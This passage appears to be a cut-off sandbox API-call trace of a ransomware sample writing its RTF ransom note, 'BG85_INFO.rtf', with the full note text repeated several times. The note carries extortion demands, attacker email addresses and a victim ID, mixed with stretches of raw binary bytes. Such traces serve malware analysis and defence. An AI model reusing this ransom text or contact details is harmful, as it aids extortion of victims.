\\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\nÔ48Õ>*c\x98¿PËxf]ê\x8ac¤\x1eîJ\x09ÇY5ø}\"\x1f¯·èE\x1e\x1b\x9a®*À\x83èlÁÝ9\x99\x91i\x09\x9dÃø\x06Öå¥{\x9cÚ\x14\\\x7fÀï\x1b\x02\x03¬s\räç\x7f\x99õ c§¾\x9fÞ\x8bØfì¯ÜVËÞÏIîO¾@,nåèJê\x97\x03w\x07Ôr\x87\x13­4×¾\x80B=ÿƨ­DĨÊƶ\x19bonv|ßu5±\x12Qe\x7f\x9a\x8f\x02RùÿÙ¡ÃÀkI>o Ø\x95&Fk\x09²bß\x8a¨n*N\x0c-¶\x07º3_¨42>\x9b§g¶r ê\x91\x02Çy\x98\x1f\x99f±{\r9£", lpUsedDefaultChar=0x0) returned 7247 [0066.730] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.731] CloseHandle (hObject=0x1cc) returned 1 [0066.731] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\bg85_info.rtf")) returned 0xffffffff [0066.732] GetLastError () returned 0x2 [0066.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0067.683] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.683] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, 